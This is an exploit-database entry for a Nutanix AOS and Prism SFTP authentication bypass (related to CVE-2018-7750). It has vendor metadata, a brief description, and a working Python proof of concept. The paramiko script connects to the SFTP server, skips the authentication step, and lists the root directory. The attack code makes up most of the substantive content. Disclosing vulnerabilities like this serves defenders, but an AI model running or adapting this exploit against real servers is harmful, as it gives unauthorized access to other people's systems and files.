Nutanix AOS & Prism - SFTP Authentication Bypass

vendor:

Acropolis Operating System

by:

Adam Brown

9.8

CVSS

CRITICAL

SFTP Authentication Bypass

Unknown

CWE

Product Name: Acropolis Operating System

Affected Version From: Unknown

Affected Version To: < 5.5.5 (LTS), < 5.8.1 (STS)

Patch Exists: NO

Related CWE: CVE-2018-7750

CPE: Unknown

Other Scripts:

Platforms Tested: Acropolis Operating System

2018

Nutanix AOS & Prism – SFTP Authentication Bypass

The Acropolis SFTP server doesn't check if the client has completed the authentication step before allowing the client to open channels. This allows an attacker to list the root directory without authenticating.

Mitigation:

Unknown

Source

Exploit-DB raw data:

# Exploit Title: Nutanix AOS & Prism - SFTP Authentication Bypass
# Date: 2018-10-27
# Exploit Author: Adam Brown
# Vendor Homepage: https://www.nutanix.org
# Software Link: https://www.nutanix.com/products/software-options/
# Version: < 5.5.5 (LTS), < 5.8.1 (STS)
# Tested on: Acropolis Operating System
# CVE : Related to CVE-2018-7750
#
# This PoC is based on discussions found at the following blog post:
#   https://coffeegist.com/security/paramiko-ssh-authentication-bypass-in-nutanix/
# TLDR, the Acropolis SFTP server doesn't check if the client has completed the
# authentication step before allowing the client to open channels. The PoC below
# connects to the acropolis SFTP server, and lists the root directory without
# authenticating.

#!/usr/bin/python
import paramiko

host = '127.0.0.1'
port = 2222

trans = paramiko.Transport((host, port))
trans.start_client()

# If the call below is skipped, no username or password is required.
# trans.auth_password('username', 'password')

sftp = paramiko.SFTPClient.from_transport(trans)
print(sftp.listdir('/'))
sftp.close()